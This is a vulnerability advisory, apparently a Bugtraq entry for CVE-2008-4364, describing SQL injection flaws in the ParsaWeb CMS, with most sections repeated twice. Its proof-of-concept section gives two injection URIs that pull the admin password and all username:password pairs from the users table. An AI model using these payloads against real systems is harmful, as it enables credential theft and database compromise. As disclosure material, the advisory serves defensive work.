ParsaGostar ParsaWeb Multiple SQL Injection Vulnerabilities
BID:31450
Info
ParsaGostar ParsaWeb Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 31450 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-4364 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 28 2008 12:00AM |
| Updated: | May 07 2015 05:23PM |
| Credit: | AmnPardaz Security Research & Penetration Testing Group |
| Vulnerable: |
ParsaGostar ParsaWeb 0 |
| Not Vulnerable: | |
Discussion
ParsaGostar ParsaWeb Multiple SQL Injection Vulnerabilities
ParsaWeb is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in SQL queries.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ParsaWeb is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in SQL queries.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
ParsaGostar ParsaWeb Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/?page=page&id=-164 or 1=(select top 1 user_pass from tblUsers where user_name = 'admin')
http://www.example.com/?page=Search Search:AmnPardaz%') union ALL select '1',user_name+':'+user_pass,'3','4','5','6','7','8','9','10',11 from tblUsers--
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/?page=page&id=-164 or 1=(select top 1 user_pass from tblUsers where user_name = 'admin')
http://www.example.com/?page=Search Search:AmnPardaz%') union ALL select '1',user_name+':'+user_pass,'3','4','5','6','7','8','9','10',11 from tblUsers--
Solution / Fix
ParsaGostar ParsaWeb Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
ParsaGostar ParsaWeb Multiple SQL Injection Vulnerabilities
References:
References:
- ParsaWeb Homepage (ParsaGostar)
- ParsaWeb CMS SQL Injection ([email protected])